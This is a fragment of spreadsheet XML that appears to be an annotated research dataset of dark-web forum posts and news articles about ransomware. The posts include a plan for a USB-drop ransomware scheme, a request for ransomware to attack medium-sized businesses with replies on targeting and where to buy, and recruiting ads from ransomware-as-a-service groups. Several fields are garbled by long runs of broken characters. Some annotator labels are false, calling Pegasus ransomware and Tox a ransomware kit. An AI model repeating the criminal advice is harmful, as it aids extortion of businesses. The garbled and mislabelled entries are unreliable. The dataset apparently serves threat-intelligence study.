guilty to the charges. currently, the u.s., france and russia are seeking for his extradition.</t>
  </si>
  <si>
    <t>authorities arrested an alleged criminal and fined his cryptocurrency exchange for being used as a tool to launder money, facilitate dark web drug sales and ransomware activities.</t>
  </si>
  <si>
    <t>721c3524d06d3f823ca2</t>
  </si>
  <si>
    <t>US authorities Fine cryptocurrency exchange owned by an arrested dark web kingpin.</t>
  </si>
  <si>
    <t>world-leading chemical distribution company brenntag has shared additional info on what data was stolen from its network by darkside ransomware operators during an attack from late april 2021 that targeted its north america division.;;brenntag is the second largest in sales for north america, according to the icis report on the top 100 chemical distributors worldwide.;;the chemical distribution company is headquartered in germany and has more than 17,000 employees worldwide at over 670 sites.;;stolen info includes ssns, medical info and more.;;brenntag confirmed the ransomware attack in an email statement sent to bleepingcomputer on may 13, saying that it disconnected all impacted systems from the network after the incident was discovered to contain the threat.;;however, as revealed in data breach notification letters sent to affected individuals during late june, the chemical distribution firm became aware of the attack on april 28, two days after the darkside operators breached its network.;;"our investigation confirmed that brenntag systems were accessed without authorization starting on april 26, 2021, and/or that some information was taken from our system," the company said.;;the data exfiltrated by the darkside attackers includes "social security number, date of birth, driver's license number, and select medical information.";;luckily, as brenntag further explained, third-party cybersecurity forensic experts hired to investigate the incident found no evidence that the stolen information was misused for fraudulent purposes.;;the company also asked the impacted individuals (more than 6700 according to info provided to maine's attorney general) to review their account statements and keep an eye on their free credit reports to detect any attempts of identity theft and fraud.;;"if you find any transactions you do not recognize, contact the business or institution issuing the statement," brenntag added.;;as bleepingcomputer reported in may, the chemical distributor company paid a $4.4 million ransom to darkside for a decryptor and to prevent the ransomware gang from leaking the stolen data.;;the ransom was negotiated down from 133.65 bitcoins (roughly $7.5 million at the time), with brenntag having sent the $4.4 million to the attackers on may 11, as bleepingcomputer was able to confirm.;;after the attack, the darkside ransomware group claimed to have exfiltrated150gb of data while they had access to brenntag's systems.;;as proof of their claims, the threat actors also created a private data leak page with a description of the types of stolen data and screenshots of some of the files.;;the darkside affiliate who breached brenntag's systems claimed to have gotten access to the network using stolen credentials bought from an unknown source.;;this aligns with similar tactics employed by other ransomware gangs who regularly purchase stolen credentials (including remote desktop credentials) from dark web marketplace.;;bleepingcomputer reported in april that threat actors used uas, one of the largest rdp marketplaces, to sell more than 1.3 million stolen credentials since the end of 2018.;;the darkside ransomware gang has been active since august 2020 with a focus on corporate networks and asking millions of dollars for decryptors and the promise not to release stolen data.;;the ransomware group landed in the crosshairs of the us government and law enforcement after hitting colonial pipeline, the largest fuel pipeline in the us.;;following heightened scrutiny from law enforcement, darkside decided to suddenly shut down in may out of fear of being arrested.;;darkside hit other organizations in the past, including discount car and truck rentals, brookfield residential, and brazil's eletrobras and copel energy companies.</t>
  </si>
  <si>
    <t xml:space="preserve">Chemical distribution Brenntag shares more information about what was stoeln during a ransomware attack </t>
  </si>
  <si>
    <t>acf00a7a614580c83d0e</t>
  </si>
  <si>
    <t>US chemical distributor shares info on DarkSide ransomware data theft</t>
  </si>
  <si>
    <t>{'darkside': 8, 'ransomware': 7}</t>
  </si>
  <si>
    <t>���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������;���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������;;the u.s. treasury department announced sanctions today against iran's ministry of intelligence and security (mois) and its minister of intelligence for their role in the july cyberattack against the government of albania, a u.s. ally and a nato member state.;;mois is the iranian government's leading intelligence agency, tasked with coordinating intelligence and counterintelligence efforts, as well as covert actions supporting the islamic regime's goals beyond the country's borders.;;"since at least 2007, the mois and its cyber actor proxies have conducted malicious cyber operations targeting a range of government and private-sector organizations around the world and across various critical infrastructure sectors," the treasury dept's office of foreign assets control (ofac) said.;;"in july 2022, cyber threat actors assessed to be sponsored by the government of iran and mois disrupted albanian government computer systems, forcing the government to suspend online public services for its citizens.";;after linking the july cyberattack that targeted albanian government infrastructure to iranian threat actors, albanian prime minister edi rama announced on wednesday that the country severed diplomatic ties with iran and asked all embassy staff to leave within 24 hours.;;the u.s. government, nato, and the u.k. also formally blamed iran for its reckless cyberattacks against albania, saying the country would be held accountable for threatening the security of a nato ally.;;"iran's cyber attack against albania disregards norms of responsible peacetime state behavior in cyberspace, which includes a norm on refraining from damaging critical infrastructure that provides services to the public," said brian e. nelson, the treasury's under secretary for terrorism and financial intelligence today.;;"we will not tolerate iran's increasingly aggressive cyber activities targeting the united states or our allies and partners.";;;mois-controlled threat groups;;earlier this year, u.s. cyber command (uscybercom) officially linked the iranian-backed muddywatter threat group to iran's ministry of intelligence and security (mois).;;this cyber-espionage group (also known as seedworm and temp.zagros) was first spotted in 2017 and is known for focusing its espionage attacks on middle eastern entities targeting dissidents and government organizations.;;muddywater was also linked to attacks against government and defense entities in central and southwest asia and numerous privately-held and public orgs from north america, europe, and asia [1, 2, 3].;;mois is also known for controlling apt39, another cyber espionage group engaging in surveillance operations aligned with iranian interests since november 2014.;;"mois carries out cyber espionage and disruptive ransomware attacks on behalf of the iranian government in parallel with the other iranian security service the irgc," john hultquist, mandiant's vice president of intelligence analysis, told bleepingcomputer.;;"these actors have also been involved in ransomware incidents that may have been ultimately designed for disruptive purposes rather than financial gain. those operations were a template for the albania attack.";;https://www.washingtonpost.com/politics/us-sanctions-iran-intelligence-over-albania-cyberattack/2022/09/09/6230730c-305b-11ed-bcc6-0874b26ae296_story.html;;https://www.reuters.com/world/us-imposes-sanctions-iran-over-cyber-activities-cyberattack-albania-2022-09-09/;;https://www.usnews.com/news/politics/articles/2022-09-09/u-s-sanctions-iran-intelligence-over-albania-cyberattack</t>
  </si>
  <si>
    <t>Article about US sanctioning Iran over suspected ransomware attacks</t>
  </si>
  <si>
    <t>0c1413c547b46df6936b</t>
  </si>
  <si>
    <t>US sanctions Iran���s Ministry of Intelligence over Albania cyber</t>
  </si>
  <si>
    <t>8 days 04:02:00</t>
  </si>
  <si>
    <t>so i was having some shower-thoughts and was thinking, what if someone dropped 200 usb sticks with ransomware on them in a city of choice? maybe 10% perhaps would pay up and you would make a very handsome gain whilst almost leaving no traces. does anyone know of usb activated ransomware? i bet it could be done but i am having a really hard time finding ransomware to buy anyway so i guess that i would have to edit existing ransomware through the zoo.;;any suggestions or tips are welcome, how solid would this plan be in terms of opsec? i think that especially if you would pick cities at random the authorities would have a really really hard time catching you.</t>
  </si>
  <si>
    <t>User comtemplating the success rate of a large scale USB drop ransomware attack</t>
  </si>
  <si>
    <t>/u/UndeadDespoiler</t>
  </si>
  <si>
    <t>17/12/2020 17:53</t>
  </si>
  <si>
    <t>c9cdc862222a9bdcc476</t>
  </si>
  <si>
    <t>USB Drop ransomware attack</t>
  </si>
  <si>
    <t>1 days 04:33:00</t>
  </si>
  <si>
    <t>human nature dictates they will try it.;;rather than drop em, post em in a envelope to an address</t>
  </si>
  <si>
    <t>/u/Munter</t>
  </si>
  <si>
    <t>17/12/2020 18:40</t>
  </si>
  <si>
    <t>���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������;���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������;;researchers from google and ibm see unprecedented blurring of lines.;;;financially motivated hackers with ties to a notorious conti cybercrime group are repurposing their resources for use against targets in ukraine, indicating that the threat actor's activities closely align with the kremlin's invasion of its neighboring country, a google researcher reported on wednesday.;;since april, a group researchers track as uac-0098 has carried out a series of attacks that has targeted hotels, non-governmental organizations, and other targets in ukraine, cert ua has reported in the past. some of uac-0098's members are former conti members who are now using their sophisticated techniques to target ukraine as it continues to ward off russia's invasion, pierre-marc bureau, a researcher in google's threat analysis said.;;;an unprecedented shift;;"the attacker has recently shifted their focus to targeting ukrainian organizations, the ukrainian government, and european humanitarian and non-profit organizations," bureau wrote. "tag assesses uac-0098 acted as an initial access broker for various ransomware groups including quantum and conti, a russian cybercrime gang known as fin12 / wizard spider.";;he wrote that "uac-0098 activities are representative examples of blurring lines between financially motivated and government-backed groups in eastern europe, illustrating a trend of threat actors changing their targeting to align with regional geopolitical interests.";;in june, researchers with ibm security x-force reported much the same thing. it found that the russia-based trickbot group���which, according to researchers at advintel, was effectively taken over by conti earlier this year��"systematically attacking ukraine since the russian invasion���an unprecedented shift as the group had not previously targeted uk";;the conti "campaigns against ukraine are notable due to the extent to which this activity differs from historical precedent and the fact that these campaigns appeared specifically aimed at ukraine with some payloads that suggest a higher degree of target selection," the ibm security x-force researchers wrote in july.;;reports from google tag and ibm security x-force cite a series of incidents. those listed by tag include:;;��� an email phishing campaign in late april delivered anchormail (referred "lackeybuilder"). the campaign used lures with subjects such as "project' active citizen'" and "file_change,_booking.";;��� a phishing campaign a month later targeted organizations in the hospitality industry. the emails impersonated the national cyber police of ukraine and attempted to infect targets with the icedid malware.;;��� a separate phishing campaign targeted the hospitality industry and an ngo located in italy. it used a compromised hotel account in india to trick its targets.;;��� a phishing campaign that impersonated elon musk and his satellite venture starlink in an attempt to get targets in ukraine's technology, retail, and government sectors to install malware.;;��� a campaign with more than 10,000 spam emails impersonated the state tax service of ukraine. the emails had an attached zip file that exploited cve-2022-30190, a critical vulnerability known as follina. tag managed to disrupt the campaign.;;leaked ransomware documents show conti helping putin from the shadows;the findings by google tag and ibm security x-force track with documents leaked earlier this year showing some conti m kremlin.;;;;https://arstechnica.com/information-technology/2022/09/hackers-with-conti-cybercrime-group-are-repurposing-tools-for-attacks-on-ukraine/;;https://arstechnica.com/information-technology/2022/03/leaked-ransomware-documents-show-conti-helping-putin-from-the-shadows/</t>
  </si>
  <si>
    <t>Post about how tools similar to the ones used by the Conti ransomware group are being used to attack Ukranian targets</t>
  </si>
  <si>
    <t>f5032c49b5b6c8cc21b6</t>
  </si>
  <si>
    <t>Ukraine is under attack by hacking tools repurposed from Conti cybercrime group</t>
  </si>
  <si>
    <t>28 days 09:43:00</t>
  </si>
  <si>
    <t>a 32-year-old ukrainian national has been sentenced to five years in prison in the u.s. for the individual's criminal work as a "high-level hacker" in the financially motivated group fin7.;;denys iarmak, who worked as a penetration tester for the cartel from november 2016 through november 2018, had been previously arrested in bangkok, thailand in november 2019, before being extradited to the u.s. in may 2020.;;in november 2021, iarmak had pleaded guilty to one count of conspiracy to commit wire fraud and one count of conspiracy to commit computer hacking.;;fin7 has been attributed to a number of attacks that have led to the theft of more than 20 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations in the u.s, costing the victims $1 billion in losses.;;the criminal gang, also known as carbanak group and the navigator group, has a track record of hitting restaurant, gambling, and hospitality industries to siphon customer credit and debit card numbers since at least 2015 that were then used or sold for profit.;;"mr. iarmak was directly involved in designing phishing emails embedded with malware, intruding on victim networks, and extracting data such as payment card information," said u.s. attorney nicholas w. brown of the western district of washington. "to make matters worse, he continued his work with the fin7 criminal enterprise even after the arrests and prosecution of co-conspirators.";;according to court documents released by the u.s. justice department (doj), the defendant used atlassian's jira project management and issue-tracking software to coordinate and share details pertaining to different intrusions conducted by the group.;;"under each issue, fin7 members tracked their progress breaching a victim's security, uploaded data stolen from the victim, and provided guidance to each other," the doj said.;;iarmak is the third fin7 member of the group to be sentenced in the u.s. after fedir hladyr and andrii kolpakov, both of whom were awarded a prison term of 10 years and seven years respectively in april and june last year.;;the development comes as threat intelligence and incident response firm mandiant detailed the evolution of fin7 into a resilient cyber crime group, linking it to 17 clusters of previously unattributed threat activity spanning several years, while also calling out its upgraded attack toolkit and initial access techniques and its shift to ransomware to monetize its attacks.</t>
  </si>
  <si>
    <t>Ukranian national sentenced to 5 years in prison for being related to various hackings and ransomware attacks</t>
  </si>
  <si>
    <t>a2623aeeb8f3889812c6</t>
  </si>
  <si>
    <t>Ukrainian FIN7 Hacker Gets 5-Year Sentence in the United States</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;authorities in ukraine this week charged six people alleged to be part of the clop ransomware group, a cybercriminal gang said to have extorted more than half a billion dollars from victims. some of clop���s victims this year alone include stanford university medical school, the university of california, and university of maryland.;;;source:;krebs on security;;according to a statement and videos released today, the ukrainian cyber police charged six defendants with various computer crimes linked to the clop gang, and conducted 21 searches throughout the kyiv region. first debuting in early 2019, clop is one of several ransomware groups that hack into organizations, launch ransomware that encrypts files and servers, and then demand an extortion payment in return for a digital key needed to unlock access.;;clop has been especially busy over the past six months exploiting four different zero-day vulnerabilities in file transfer appliance (fta), a file sharing product madelifornia-based accellion. the clop gang seized on those flaws to deploy ransomware to a significant number of accellion���s fta customers, including u.s. grocery chain krogers, the law firm jones day, security firm qualys, and the singaporean telecom giant singtel.;;last year, clop adopted the practice of attempting to extract a second ransom demand from victims in exchange for a promise not to publish or sell any stolen data. terabytes of documents and files stolen from victim organizations that have not paid a data ransom are now available for download from clop���s deep web site, including stanford, ucla and the university of maryland.;;it���s not clear how much this law enforcement operation by ukrainian authorities will affect the overall operations of the clop group. cybersecurity intelligence firm intel 471 says the law enforcement raids in ukraine were limited to the cash-out and money laundering side of clop���s business only.;;���we do not believe that any core actors bue to the fact that they are probably living in russia,��� intel 471 concluded. ���the overall impact to clop is expected to be minor although this law enforcement attention may result in the clop brand getting abandoned as we���ve recently seen with other ransomware groups like darkside and babuk���.;;while clop as a moneymaking collective is fairly young organization, security experts say clop members hail from a group of threat actors (ta) known as ���ta505,��� which mitre���s att&amp;ck database says is a financially motivated cybercrime group that has been active since at least 2014. ���this group is known for frequently changing malware and driving global trends in c</t>
  </si>
  <si>
    <t>Ukranian authorities charged six people alleged to be a part of the Clop ransomware group</t>
  </si>
  <si>
    <t>20/06/2021 21:28</t>
  </si>
  <si>
    <t>0972b3de5bb7444a1f01</t>
  </si>
  <si>
    <t>Ukrainian Police Nab Six Tied to CLOP Ransomware</t>
  </si>
  <si>
    <t>{'extortion': 1, 'darkside': 1, 'ransomware': 5}</t>
  </si>
  <si>
    <t>i mean, the term "cybercrime" is very broad. that's like saying "smuggling". well, theres a lot of different things that are smuggled. drugs, humans, guns, etc. same with cybercrime. are we talking crypto theft, ransomware, fraud? most cybercrime groups specialize in a certain field. lets pick ransomware for example. ransomware costed the world $20 billion in 2021.;;the global drug trade is estimated at between 400 billion and 600 billion every year. ok, but the global drug trade is very broad as well. lets pick something more specific, like cocaine trafficking. in 2019, global cocaine production was estimated at 1,784 metric tons. that equals 1,618,417.5 kilos. if each kilo was sold in the country of production in south america for $1,000 each, that equals $1,618,417,500. thats a lot, but its not correct either. thats because the bulk of the money from drug sales comes from retail. if we break 1,784 tons down into grams, that equals 1,618,417,600 grams. if each gram sells for $80, that equals around $129 billion.;;all of these figures are subjective, but in general, the drug trade is still far more profitable. it is also far easier to get into. buy low and sell high, make sure your shit is good and thats half of it. succesful cybercriminals need a wide range of skills. you have to really know what you're doing to make money in that game. it is safer, though. you don't need to leave your house and encryption technology is getting better every year. less prison time too, way less (usually).</t>
  </si>
  <si>
    <t>User part of a debate between cyber crime and drug dealers</t>
  </si>
  <si>
    <t>/u/JohnKennedy</t>
  </si>
  <si>
    <t>20/02/2022 21:09</t>
  </si>
  <si>
    <t>cf9d3be2baa30b79c569</t>
  </si>
  <si>
    <t>Ultimate Team Debate: Cyber Criminals vs Drug Dealers!</t>
  </si>
  <si>
    <t>0 days 05:09:00</t>
  </si>
  <si>
    <t>29 days 15:59:00</t>
  </si>
  <si>
    <t>the university of maastricht has reportedly paid a ransom of ���several hundred thousand euros��� to hackers in order to regain access to its systems after it was hit with a severe ransomware attack.;;the university acknowledged that it had been hit with a ransomware attack on christmas eve 2019 and said that almost all of its windows systems had been hit. the attack prevented the university from accessing its data and also affected its email services.;;in the days following the attack, the university reported that it had filed an official police report, temporarily taken its systems offline, and was working to gets its systems restored. it also told students and staff to ���not perform any actions on um [university of maastricht] computers or systems��� and that they would have to change their passwords.;;now, according to observant, an independent weekly magazine from the university of maastricht, the university has paid the ransom and ���may have paid a few hundred thousand euources at the university of maastricht who added that the ransom was most likely paid in bitcoins and that the hackers have now handed over the key which made the university���s systems accessible again.;while the university of maastricht has not yet provided any information regarding communication with the hackers, it has confirmed that ���the most important education-related computers systems��� are up and running again in a limited capacity.;;this incident is the latest of several ransomware attacks to affect large institutions over the last year. in 2019, a city in florida was hit with a ransomware attack and ultimately paid $600,000 to regain access to its systems. government computers in the city of baltimore were also hit by a ransomware attack ea</t>
  </si>
  <si>
    <t>University of Maastricht paid ransom to regain access to its systems</t>
  </si>
  <si>
    <t>a69968d08694ac158303</t>
  </si>
  <si>
    <t>University of Maastricht reportedly pays ransomware hackers paid a few hundred thousand euro to regain access to its systems</t>
  </si>
  <si>
    <t>1 days 01:35:00</t>
  </si>
  <si>
    <t>hell of a story .;$ 600.000 not a small amount.;;wonder if it was done solo.;;;fakemoneynews</t>
  </si>
  <si>
    <t>/u/FakeMoneyNews</t>
  </si>
  <si>
    <t>0 days 11:47:00</t>
  </si>
  <si>
    <t>lmao! they must of been mad and ashamed paying to get their system back. i wonder what the exact amount was  they gave those university hackes.</t>
  </si>
  <si>
    <t>/u/DNevangelist</t>
  </si>
  <si>
    <t>0 days 13:48:00</t>
  </si>
  <si>
    <t>can't reveal much info but have some circle with external affairs ministry officer as i'm friend.;he was also targeted with pegasus spyware and have meeting with him just 30 minutes ago as normal.;;there is one issue with pegasus spyware(only for ios known right now, don't know about android):;if your phone noise cancellation option is on and you are connected with wireless bluetooth device etc(other than apple brand) like if your iphone is connected with boat wireless device or samsung wireless device or any other brand and if you are at place where noise is too much then pegasus spyware confuse and react abnormal.;;as he said if you are connected with bluetooth device on iphone(other than apple brand) at market place and where noise is too much then your iphone volume suddenly up and down(not too much, you can test on online music etc ) but you can notice that difference and if you feel that then believe me my fellows you are already fucked and be careful(i still don't why brand other than apple because my source tell me that airpods was working fine but he changed to boats company device because his one airpod was not working and he noticed. as he is diplomat, he tested his iphone and he was infected, he doesn't have any idea yet why he has been targeted, may me by own government or different reason);;may be many hackers and professional got this information or not but i got info 30 minutes ago and when he tested his mobile he was on target as he is diplomat.;;so be careful and yes professionals and hacker if they don't know about it then i'm sure then can fuck pegasus spyware.;i thought may be it will help you and it is important that's is why i'm sharing this info.;;thanks;have a nice day,;;(sorry about my english or grammer if you have any issue to understand)</t>
  </si>
  <si>
    <t>User spreading information about a bug in the Pegasus ransomware</t>
  </si>
  <si>
    <t>22/05/2022 18:41</t>
  </si>
  <si>
    <t>3b2c2950127ab0d45314</t>
  </si>
  <si>
    <t>Urgent Update about Pegasus(Just got info)</t>
  </si>
  <si>
    <t>0 days 09:50:00</t>
  </si>
  <si>
    <t>interesting. zeussii still around? i read somewhere that some cardiologist was be found to be the author or redistributor of some ransomware and arrested.</t>
  </si>
  <si>
    <t>/u/calibrate_dice</t>
  </si>
  <si>
    <t>22/05/2022 19:47</t>
  </si>
  <si>
    <t>thanos ransomware!</t>
  </si>
  <si>
    <t>/u/BenjaminButton</t>
  </si>
  <si>
    <t>23/05/2022 03:25</t>
  </si>
  <si>
    <t>0 days 07:38:00</t>
  </si>
  <si>
    <t>yes thanos ramsomware, i did post about that yesterday</t>
  </si>
  <si>
    <t>23/05/2022 04:31</t>
  </si>
  <si>
    <t>who are the vandili;- this is vandili, we're a brand new ransomware group. but this doesn't imply we don't have any experience;;;we  assault finance organizations that have the capacity to pay the asked amount rr scammer and ponzi website. we don't have any intentions to kill any small  enterprise.;before any assault we cautiously examine our target after which decide how plenty they may pay. once the charge is showed in blockchain we surrender the decryption tool.;our most important purpose is economic gains.;;our enterprise model:;we have barely exclusive manner of doing enterprise. we do every and the whole thing through ourself. from preliminary get right of entry to to activating the ransomware.;;the maximum you do, the maximum you earn;what we need.;���coders: programmers to write malicious code, integrate disparate technologies.;���testers: people in charge of testing malware against security tools and obfuscating it.;���administrators: people tasked with setting up, tearing down servinfrastructure.;���reverse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pen-tester;;;how to contact?;- pm's. send a messages and you will be answered.;;thank you f</t>
  </si>
  <si>
    <t>Vandili group attempting to recruit</t>
  </si>
  <si>
    <t>/u/Therpcp</t>
  </si>
  <si>
    <t>26/05/2022 03:09</t>
  </si>
  <si>
    <t>ac210653733e702a4a2d</t>
  </si>
  <si>
    <t>Vandili Group Recruiting</t>
  </si>
  <si>
    <t>0 days 12:03:00</t>
  </si>
  <si>
    <t>/u/zian;what you think about this now ? lol</t>
  </si>
  <si>
    <t>26/05/2022 07:48</t>
  </si>
  <si>
    <t>0 days 04:39:00</t>
  </si>
  <si>
    <t>volvo cars suffered a cyberattack that led to the loss of trade secrets that were apparently shared on the dark web by a ransomware gang;;http://tape6m4x7swc7lwx2n2wtyccu4lt2qyahgwinx563gqfzeedn5nb4gid.onion/volvo-cars-suffers-cyberattack-company-secrets-stolen</t>
  </si>
  <si>
    <t>Volvo cars suffer a ransomware attack leading to trade secrets lost</t>
  </si>
  <si>
    <t>21/12/2021 17:45</t>
  </si>
  <si>
    <t>3a66587448b89dde4115</t>
  </si>
  <si>
    <t>Volvo Cars Suffers Cyberattack, Company Secrets Stolen</t>
  </si>
  <si>
    <t>hello everyone i hope you all are doing good..so basically i want to perform a ransomeware attack against some medium size business's..i got plans on how to perform the attack but very confused in selecting the type of ransomeware that would do the job for me.(i want to encrypt their server's or wherever they store their critical data and stuff..).so i would really appreciate if you could suggest me some ransome's for my work..;;thanks for your time,suggestions and recommendation's gentlemen :);have a nice day.</t>
  </si>
  <si>
    <t>Potential hacker asking for sutable ransomware for medium sized targets</t>
  </si>
  <si>
    <t>/u/Travor15</t>
  </si>
  <si>
    <t>26/08/2021 20:18</t>
  </si>
  <si>
    <t>67ce4382db0ac68e55b5</t>
  </si>
  <si>
    <t>Want to perform a ransomeware attact against medium size business's..Which is the Best Ransomware that would do the Job for me???</t>
  </si>
  <si>
    <t>87 days 14:25:00</t>
  </si>
  <si>
    <t>26/08/2021 20:33</t>
  </si>
  <si>
    <t>b2744deb393b8db1f79a</t>
  </si>
  <si>
    <t>18 days 00:11:00</t>
  </si>
  <si>
    <t>medium sized business huh kind of cringe</t>
  </si>
  <si>
    <t>26/08/2021 20:43</t>
  </si>
  <si>
    <t>so what do you recommend sir??</t>
  </si>
  <si>
    <t>26/08/2021 20:48</t>
  </si>
  <si>
    <t>go for the richest people you can;you miss 100% of the shots you don't take</t>
  </si>
  <si>
    <t>26/08/2021 20:50</t>
  </si>
  <si>
    <t>ranion raas?</t>
  </si>
  <si>
    <t>/u/blackmarket4177</t>
  </si>
  <si>
    <t>26/08/2021 22:07</t>
  </si>
  <si>
    <t>hey,;;i'm the developer of the redeemer ransomware, available on dread.;check out;/d/redeemer;for more information.;;from my perspective, since the ransomware is developed from 0, it is probably one of the safest ransomware to use, it uses no internet and i keep no logs of any kind of my affiliates. anyone is free to join, anyone can download it. also there is no restricted usage of any kind - you're allowed to attack anyone and anything (even your computer :)), if you saved your affiliate key on some secure memory).;;you're also welcomed to try it on a virtual machine, it's free, just use the email provided in the subdread.;i put great pride in my code and i will continue improving it in the future.</t>
  </si>
  <si>
    <t>Redeemer raas group posting to recruit</t>
  </si>
  <si>
    <t>26/08/2021 23:14</t>
  </si>
  <si>
    <t>i don't think he should be going after big fish. several times ransomware gangs have deployed inside a large network and it spreads and ends up being too much for them to handle. i think that his decision to go with medium size is smarter.</t>
  </si>
  <si>
    <t>/u/justwatchin</t>
  </si>
  <si>
    <t>27/08/2021 06:56</t>
  </si>
  <si>
    <t>0 days 07:42:00</t>
  </si>
  <si>
    <t>yes you are correct that's the reason i'm going with medium size  business's thanks for your understanding :)</t>
  </si>
  <si>
    <t>27/08/2021 08:43</t>
  </si>
  <si>
    <t>i don't want to do this at my first with not much experience so i think it makes sense to try with some medium/few small  business's. anyway thanks for the translation :)</t>
  </si>
  <si>
    <t>27/08/2021 08:46</t>
  </si>
  <si>
    <t>don't buy any malware/ransomware from the markets 99% have back doors or any other malicious code;go straight to the source bro which is the rusian forums xxs/wwh/exploit.</t>
  </si>
  <si>
    <t>/u/ratapeluaqw</t>
  </si>
  <si>
    <t>28/08/2021 11:03</t>
  </si>
  <si>
    <t>0 days 14:59:00</t>
  </si>
  <si>
    <t>;;want to perform a ransomeware attact against medium size business's..which is the best ransomware that would do the job for me???;;by;/u/travor15;���;1 year ago;in;/d/hacking;;1 points;���;2</t>
  </si>
  <si>
    <t>d2d96123a33f4be619cd</t>
  </si>
  <si>
    <t>if you don't have access to networks, why ask?</t>
  </si>
  <si>
    <t>4 days 12:50:00</t>
  </si>
  <si>
    <t>hello, brother, i am a hacker, like you, i am looking for raas service and ransomware, i want to make money, may i ask if you have found the real raas service</t>
  </si>
  <si>
    <t>/u/zeus2021</t>
  </si>
  <si>
    <t>{'raas': 2}</t>
  </si>
  <si>
    <t>Vulcan ransomware group attempting to recruit</t>
  </si>
  <si>
    <t>14/03/2022 11:50</t>
  </si>
  <si>
    <t>67d2d3ede64c4bb6d4e1</t>
  </si>
  <si>
    <t>We are looking for affiliates | VulcanRansomTeam</t>
  </si>
  <si>
    <t>hey when hacking is it a big deal what application you use to hack (like metasploit or python) or can you do it with any application you know.</t>
  </si>
  <si>
    <t>User asking what is the best application to hack in</t>
  </si>
  <si>
    <t>bbf89195f73c77d5f896</t>
  </si>
  <si>
    <t>What Application Can You Use To Hack?</t>
  </si>
  <si>
    <t>0 days 07:45:00</t>
  </si>
  <si>
    <t>i buy rat's and ransomwares online, then use them, it depends</t>
  </si>
  <si>
    <t>User asking what is the best application to hack in - recommending buying rat's and ransomwares online</t>
  </si>
  <si>
    <t>/u/Masterm0nd</t>
  </si>
  <si>
    <t>tox is very very nice, p2p, e2e encrypted protocol. many clients. it is in most strong parts of russian hacker scene already replacing jabber as being number one chat platform.;if you take look at damagelab, exploit and maza you will see that all ransomware gangs ( darkside, avandon, revil, lockbit, babuk... which extort milions, even darkside which hacked colonial pipeline ), and their inicial access brokers, are all using tox.;is becoming new gold standard;;;;ok, yes, it have a "drawback" that it reveals ip, but 99% of tox users use either tor or vpn or some ssh, so that doesnt matter.;and also 99% of tox users never use it for videocalls, never. just typing and file transfers, many clients dont even support calls.;did you ever tried on any platform videocall with tor ? it will not work, never. no mather what bandwith you have, it will not work. is just to slow. try it on signal or wickr or whatever, it will not work, same reason in wont there. you can just cascade 2 fast vpns, or one vpn amd vicsocks, if you want call.;;i use qtox on all rdps, qtox on linux host, atox on graphene phone.</t>
  </si>
  <si>
    <t>Post describing what Tox is (the "gold standard" ransomware creation kit that enables most users to create a fully functional ransomware infection)</t>
  </si>
  <si>
    <t>a2bd644eb90267f49f46</t>
  </si>
  <si>
    <t>What Is Tox Ans Should You Use It?</t>
  </si>
  <si>
    <t>28 days 11:27:00</t>
  </si>
  <si>
    <t>so, i assume most here aren't "grand" hackers but hackers that hack for fun &amp; probably more of an intermediate hacker than a pro (no hate i'm only a sophomore in cs atm). there has to be some private sites that are full of expert hackers that release their code for other hackers to use. if anyone knows anything about this please let us know, i'm interested in learning about ransomware as i just started getting into it. i like the idea that you can encrypt a pc's files and all the possibilities of using this type of software. i don't care about obtaining money from this as gov. agencies typically find the perpetrators quite easily (a lot of the times).;;all the ransomware repo's on git/github (&amp; other places) aren't too powerful, i'm curious about powerful ransomware like wannacry ( i guess no one has the code for that...).</t>
  </si>
  <si>
    <t>User asking for any education regarding ranomsware and asking for the location of hacker sites to further their education</t>
  </si>
  <si>
    <t>/u/shieldedo</t>
  </si>
  <si>
    <t>f2716b56a119ca98abab</t>
  </si>
  <si>
    <t>What are some of the "hidden" hacker websites? There used to be a lot, now I can't find any...</t>
  </si>
  <si>
    <t>3 days 06:32:00</t>
  </si>
  <si>
    <t>there are some on the list i posted and in its comments, but really i think the clearnet has better resources. exploit.in is pretty boss.</t>
  </si>
  <si>
    <t>/u/imissprivacy</t>
  </si>
  <si>
    <t>what list? are you talking about this sub's side bar? yeah, i see that you can download wannacry just don't know if its the source code or not. i'm more interested in cryptowall, can't seem to find that i guess you have to be a professional pentester to get access to it. thanks for the help too man!</t>
  </si>
  <si>
    <t>you're welcome - no it's just a different post in this subdread from 3-4 days ago. it's called "semi categorized list of hacking resources" or something close to that.</t>
  </si>
  <si>
    <t>0 days 10:52:00</t>
  </si>
  <si>
    <t>maza is the most secret and hidden board. even if you know the full url, you will need a specific selfmade ssl certificate to enter - and to get it you need an invite and you need to pay some xxxx amount to get in.</t>
  </si>
  <si>
    <t>/u/QubesWhonix</t>
  </si>
  <si>
    <t>1 days 03:06:00</t>
  </si>
  <si>
    <t>maza is pretty much dead. u can find same people in exploit</t>
  </si>
  <si>
    <t>/u/clownsec</t>
  </si>
  <si>
    <t>1 days 07:25:00</t>
  </si>
  <si>
    <t>secret and hidden boards have a way of dying out from being so secret and hidden that no one ever hears of them.</t>
  </si>
  <si>
    <t>/u/strace</t>
  </si>
  <si>
    <t>0 days 08:25:00</t>
  </si>
  <si>
